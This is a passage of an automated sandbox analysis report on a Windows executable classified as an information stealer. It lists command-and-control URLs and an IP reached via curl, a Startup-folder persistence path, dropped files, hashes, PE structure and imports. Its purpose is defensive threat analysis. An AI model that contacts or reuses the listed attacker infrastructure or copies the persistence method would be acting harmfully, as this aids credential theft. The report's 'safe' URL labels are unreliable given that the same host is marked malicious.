https://peerhost59mj7i6macla65r.com/search/E-H	curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/n64;	curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/cb	curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/g_	curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/T	curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/7	curl.exe, 00000019.00000002.2404181964.00000000030D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/W	curl.exe, 0000001B.00000002.2429620320.00000000008F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/cur32.dll	curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/735C4465736B746F705C66696C652E657865	file.exe, 00000000.00000003.2211257605.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2277109701.0000000001176000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/ow-	curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/Ti	curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/;	curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peerhost59mj7i6macla65r.com/search/c	curl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.154.172.218	peerhost59mj7i6macla65r.com	Germany		10753	LVLT-10753US	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573844
Start date and time:	2024-12-12 16:45:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spre.adwa.spyw.evad.winEXE@48/4@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 51 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.190.181.0, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:46:21	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.154.172.218	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	proxyhostx1pjczefs9hedd6.com/update/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
peerhost59mj7i6macla65r.com	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	94.154.172.218

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LVLT-10753US	jew.arm.elf	Get hash	malicious	Unknown	Browse	148.57.27.159
	Needed Aircraft PN#_Desc_&_Qty Details.vbs	Get hash	malicious	AsyncRAT, VenomRAT	Browse	45.88.88.7
	Turbo Generator_Pictures & Drawing.vbs	Get hash	malicious	Unknown	Browse	45.88.88.7
	Payment Remittance Advice Details.vbs	Get hash	malicious	Unknown	Browse	45.88.88.7
	List of Required PN#_Desc_&_Qty Details.vbs	Get hash	malicious	Unknown	Browse	45.88.88.7
	Dec_2024 Shipment Packing List.vbs	Get hash	malicious	AsyncRAT, VenomRAT	Browse	45.88.88.7
	Payment Advice-Dec-2024.vbs	Get hash	malicious	Unknown	Browse	45.88.88.7
	Payment Remittance Advice for Nov 2024.vbs	Get hash	malicious	Unknown	Browse	45.88.88.7
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	94.154.172.218
	vwkjebwi686.elf	Get hash	malicious	Mirai	Browse	178.215.238.4

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	94.154.172.218
	Document.lnk.download.lnk	Get hash	malicious	Unknown	Browse	94.154.172.218
	aLsxeH29P2.exe	Get hash	malicious	Unknown	Browse	94.154.172.218
	c9a6BV0eQO.exe	Get hash	malicious	Unknown	Browse	94.154.172.218
	dYUteuvmHn.exe	Get hash	malicious	Unknown	Browse	94.154.172.218
	new.ini.ps1	Get hash	malicious	Unknown	Browse	94.154.172.218
	ALFq7XP17d.lnk	Get hash	malicious	Unknown	Browse	94.154.172.218
	kYGxoN4JVW.bat	Get hash	malicious	Unknown	Browse	94.154.172.218
	pn866G3CCj.lnk	Get hash	malicious	Unknown	Browse	94.154.172.218
	vZAhXkWkDT.lnk	Get hash	malicious	Unknown	Browse	94.154.172.218

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\tmp.bat

Download File

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\tmp.ini

Download File

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.211744090932182
Encrypted:	false
SSDEEP:	3:0uvql5jY:pvql5jY
MD5:	557464A645CBCC72FB20348E1C58DBFD
SHA1:	2A68B1E4C9CCA06C959A3174058A27DA0FADDADD
SHA-256:	2FB99E1172EC47D7D0A943294A483E9C695D774AD9ECA0C689EB0E4AD4982C66
SHA-512:	728FBA91E931258ED5AD1FF48299193384C0053770E05C0F813E8407DD328454C2C233DA52EA67EB5AAF1C523A8D0E5DE5A30B9BC94186E62C204B26DF23123E
Malicious:	false
Preview:	[Audio].Default=900.Auto=1.Force=0

C:\Users\user\AppData\Local\Temp\tmp.txt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2250
Entropy (8bit):	4.493446986425489
Encrypted:	false
SSDEEP:	48:AjuD3CC2GZ1EGK/WI49Uog4kKdQhk+mzpEAcCGuJUbV51FRZC:AjuDyC238USkKdQe+o++Ux5Py
MD5:	698EA08FA2CDA0B83B5DBBFAA4774C79
SHA1:	F11176C8D449207BA9608127E3271A02C7E34139
SHA-256:	A5BC214A1B20CDA5AFA36735B29DE1E5B0573E50FC9A4BE8E3002831A8DD0BC6
SHA-512:	368EFA38D1DF0FBA2D5E605A9A5A9CC4CC9E88371F28F7A1D37200AC9E2F4EA54A4E991A6AB8BDC614F56C46226C8EAA412EFA525FBF580EAF54638386CCEABA
Malicious:	false
Preview:	..Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: hardz..Registered Organization: ..Product ID: 00330-71388-77023-AAOEM..Original Install Date: 03/10/2023, 10:57:18..System Boot Time: 24/09/2023, 16:13:49..System Manufacturer: pPMrZmbUxk8Kmw2..System Model: HML6WVM7..System Type: x64-based PC..Processor(s): 2 Processor(s) Installed... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz.. [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz..BIOS Version: ECZO6 4O8YF, 21/11/2022..Windows Directory: C:\Windows..System Directory: C:\Win

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	920064
Entropy (8bit):	6.58614875892499
Encrypted:	false
SSDEEP:	12288:UqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgapT1:UqDEvCTbMWu7rQYlBQcBiT6rprG8at1
MD5:	5950611ED70F90B758610609E2AEE8E6
SHA1:	798588341C108850C79DA309BE33495FAF2F3246
SHA-256:	5270C4C6881B7D3EBAEA8F51C410BBA8689ACB67C34F20440527A5F15F3BC1E4
SHA-512:	7E51C458A9A2440C778361EB19F0C13EA4DE75B2CF54A5828F6230419FBF52C4702BE4F0784E7984367D67FABF038018E264E030E4A4C7DAC7BA93E5C1395B80
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: yiDQb6GkBq.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....Xg.........."..........Z......w.............@..........................`......J.....@...@.......@.....................d...\|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.58614875892499
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	920'064 bytes
MD5:	5950611ed70f90b758610609e2aee8e6
SHA1:	798588341c108850c79da309be33495faf2f3246
SHA256:	5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
SHA512:	7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80
SSDEEP:	12288:UqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgapT1:UqDEvCTbMWu7rQYlBQcBiT6rprG8at1
TLSH:	4D159E0273D1C062FFAB92334B5AF6515BBC69260123E61F13981DB9BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675897F2 [Tue Dec 10 19:35:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F301C8612F3h
jmp 00007F301C860BFFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F301C860DDDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F301C860DAAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F301C86399Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F301C8639E8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F301C8639D1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x9e98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xde000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x9e98	0xa000	ca2811cd2fd38e1e6e78fad970280636	False	0.3278076171875	data	5.429778137275275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xde000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x1160	data			1.0024730215827338
RT_GROUP_ICON	0xdd918	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xdd990	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xdd9a4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xdd9b8	0x14	data	English	Great Britain	1.25
RT_VERSION	0xdd9cc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xddaa8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
